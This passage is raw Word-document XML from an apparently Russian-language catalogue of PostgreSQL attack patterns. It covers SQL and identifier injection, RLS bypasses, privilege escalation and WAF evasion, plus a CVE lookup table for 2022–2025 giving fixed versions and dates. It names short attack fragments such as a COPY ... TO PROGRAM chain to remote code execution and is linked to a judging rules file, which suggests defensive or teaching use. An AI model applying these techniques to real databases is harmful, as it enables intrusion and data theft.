                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;&gt;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JSON path injection через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> operator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xpath() и XML tricks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XML-path injection в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">xpath()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> функциях</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3.11.4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Array vs scalar: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ANY($1)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Подмена scalar на array для widening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3.12 Комментарии и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Comments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 какие контексты попадают, какие опасны</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Вложенные </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/* /* */ */</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Nested comments — fooler WAF</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и переводы строк</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 / LF / CRLF interaction с line-based parsers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Newline в identifier (CVE-2025-8715)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chr(10)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в object names → pg_dump injection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17.5, 16.9, 15.13, 14.18, 13.21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R25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13 Privilege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Путь от application к superuser через цепочки</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 CVE-2024-10978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Reset path bug → escalation на чужую роль</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20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R8</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search_path + schema_element (CVE-2023-2454)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SCHEMA ... DEFAULT atk.evil()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> обход protective search_path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15.2, 14.7, 13.10, 12.14, 11.19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7.5 (High)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R12</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Index expressions + autovacuum (CVE-2022-1552)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Index expression callback в superuser context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14.2, 13.6, 12.10, 11.15, 10.20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8.8 (High)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R15</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Extension scripts (CVE-2022-2625)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 OR REPLACE подмена через extension upgrade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14.4, 13.7, 12.11, 11.16, 10.21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8.0 (High)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R16</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Trusted extensions как ступень</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 13+ позволяет non-superuser ставить trusted extensions с CREATE на DB</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 – 17</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R28</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SECURITY DEFINER + SET search_path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SD-функция от superuser-owner + dynamic search_path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3.14 Injection в LIMIT / OFFSET / ORDER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LIMIT/OFFSET/ORDER BY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Integer и identifier контексты</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LIMIT / OFFSET integer-context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Integer expression-context → CAST-injection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ORDER BY column_name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Identifier-token; нужен whitelist, не </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">%I</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ORDER BY column_number</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Integer в select-list reference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3.14.4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ORDER BY (CASE WHEN)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Full expression-context, oracle-канал</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3.15 Injection в LIKE / tsquery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LIKE/tsquery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Pattern и query languages с собственным escaping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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> и </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в LIKE без ESCAPE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Wildcard injection через user-controlled pattern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to_tsquery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Operators (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, `\</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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">!`) как boolean-override + syntax-error канал</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websearch_to_tsquery / plainto_tsquery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Безопасные альтернативы to_tsquery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reference (mitigation)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3.15.4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tsquery как error-based канал</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tsquery syntax-error → leak content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3.16 Identifier injection в plpgsql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Identifier injection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Class идентификатор-инъекций в plpgsql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R18</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format('%s') vs format('%I')</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для identifier → injection; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">%I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> корректно</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R18</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quote_ident() и ограничения</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Альтернатива </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">%I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, не работает в string-literal context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EXECUTE ... USING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Bind для values; для identifier — отдельная защита</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reference (mitigation)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Конкатенация через `\</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Антипаттерн dynamic SQL построения</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3.16.5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SECURITY DEFINER + dynamic SQL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SD-функция с identifier injection — RCE-path в owner-context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3.17 RLS-обходы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Версии PG</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Якорь</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 обзор</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Класс обходов Row Level Security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(overview)</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Subquery / CTE + plan-cache (CVE-2024-10976)</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RLS-фильтр кэшируется под одной ролью, применяется под другой</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20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R9</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3.17.2</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MERGE RLS (CVE-2023-39418)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MERGE не применяет UPDATE/SELECT policy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15.0 – 15.3 only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 (Low)</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R11</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reset (CVE-2024-10978)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Тот же как 3.13.1, оптика data exfiltration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17.0, 16.4, 15.8, 14.13, 13.16, 12.20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4.2 (Medium)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R8</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Optimizer stats (CVE-2025-8713)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Custom operator bypass column ACL/RLS через optimizer stats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17.5, 16.9, 15.13, 14.18, 13.21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R26</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SECURITY DEFINER функции и RLS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SD-функция от owner-roli → RLS bypass без FORCE RLS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все</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pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная статистика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Всего паттернов:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 73 подраздела (3.X.N) + 17 саммари (3.X) + 4 раздела защиты (5.X) + 4 приложения (6.X) = ~98 структурных единиц.</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CVE-anchored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (минор-фикс известен): 18 паттернов с прямым CVE-якорем.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Pattern-anchored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (research-якорь без CVE): 10 паттернов (R1–R5, R18–R20, R22, R28).</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Derived</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (без research-якоря, выводится из основных): остальные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с rules.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Подмножество паттернов покрыто в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DS-workshop2.0/app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Конкретные mappings — в каждом 3.X summary-файле в секции «Связанные паттерны / rules.py». Сводный список покрытия — в [[reference-ds-workshop-repo]].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Таблица всех CVE 2022–2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lookup-таблица по CVE-ID и R-якорю. В отличие от раздела 4 (хронология с контекстом и группировкой), 6.2 — плоский index для быстрого поиска. Сортировка — по CVE-году + CVE-номеру.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Колонки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CVE-ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — официальный CVE-номер из postgresql.org/support/security.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Год</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — год публикации advisory.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R#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — research-якорь из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sources/research.md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Класс</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — короткая категория атаки.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Краткая суть</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — одно предложение о механике.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Фикс (по major)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — first patched minor для каждой major-ветки.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Дата фикса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — день release patched-minor.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3.X.N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — категория(и) с полной карточкой или «—» если полная карточка в разделе 4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE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Год</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 (по major)</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 фикса</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3.X.N</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CVE-2022-1552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Autovacuum/REINDEX/CLUSTER без SRO sandbox → superuser-эскалация через index expression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14.3, 13.7, 12.11, 11.16, 10.21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12.05.2022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3.13.3</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CVE-2022-2625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R16</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Extension scripts с CREATE OR REPLACE подменяют чужие объекты под привилегиями admin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14.5, 13.8, 12.12, 11.17, 10.22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11.08.2022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3.13.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE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Год</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 (по major)</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 фикса</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3.X.N</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CVE-2023-2454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schema_element</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в CREATE SCHEMA обходит protective </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">search_path = pg_catalog</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15.3, 14.8, 13.11, 12.15, 11.20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11.05.2023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3.13.2</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CVE-2023-39418</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MERGE не применяет UPDATE/SELECT RLS policy, INSERT через MERGE обходит filter</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15.4 (только 15.x)</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10.08.2023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3.17.2</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CVE-2023-5868</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memory disclosure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Aggregate с unknown-type читает байты за концом буфера → leak памяти других сессий</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16.1, 15.5, 14.10, 13.13, 12.17, 11.22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09.11.2023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(4.3)</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CVE-2023-5869</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memory corruption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Integer overflow при модификации array → arbitrary code execution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16.1, 15.5, 14.10, 13.13, 12.17, 11.22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09.11.2023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(4.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE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Год</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 (по major)</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 фикса</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3.X.N</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CVE-2024-4317</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R17</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info disclosure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pg_stats_ext.most_common_vals</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> leak без права SELECT на колонку</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16.3, 15.7, 14.12 (+ manual </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fix-CVE-2024-4317.sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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09.05.2024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3.8.6</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CVE-2024-10976</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R9</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Subquery / CTE / SQL function применяют RLS policy не той роли через plan-cache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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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3.17.1</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CVE-2024-10977</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libpq MITM</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Недоверенный сервер вшивает произвольные байты в error message клиента до handshake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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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(4.4)</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R8</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bypass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 ROLE сбрасывается на неверный user ID → cross-tenant data leak</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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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3.13.1 / 3.17.3</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R7</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$ENV{} hijack из trusted plperl → PATH / LD_PRELOAD RCE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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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14.11.2024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3.7.2b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE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Год</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Фикс (по major)</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Дата фикса</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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3.X.N</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psql SQLi</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Невалидный UTF-8 → broken </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PQescapeLiteral</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → SQL injection в psql (CVSS 8.1)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17.3, 16.7, 15.11, 14.16, 13.19</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13.02.2025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3.9.7</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 chain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 chain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Chain R6 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">COPY (SELECT '') TO PROGRAM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → RCE на машине клиента</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17.3, 16.7, 15.11, 14.16, 13.19</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13.02.2025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+ 3.9.7</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CVE-2025-4207</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R27</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GB18030 1-байтовый buffer over-read → process segfault</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17.5, 16.9, 15.13, 14.18, 13.21</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08.05.2025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(4.5)</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R26</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RLS bypass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Custom operator с pluggable selectivity bypass-ит view ACL и RLS через optimizer stats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17.6, 16.10, 15.14, 14.19, 13.22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14.08.2025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3.17.4</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dump/restore SQLi</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Newline в object names → SQL injection при </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_restore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (регрессия CVE-2012-0868)</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17.6, 16.10, 15.14, 14.19, 13.22</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14.08.2025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3.12.3</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CVE-2025-12817</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CREATE STATISTICS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без CREATE-privilege на target schema → name-squatting DoS</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18.1, 17.7, 16.11, 15.15, 14.20, 13.23</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13.11.2025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(4.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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CVE-2025-13780</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R24</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adjacent RCE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pgAdmin restore regex bypass через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">\r!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
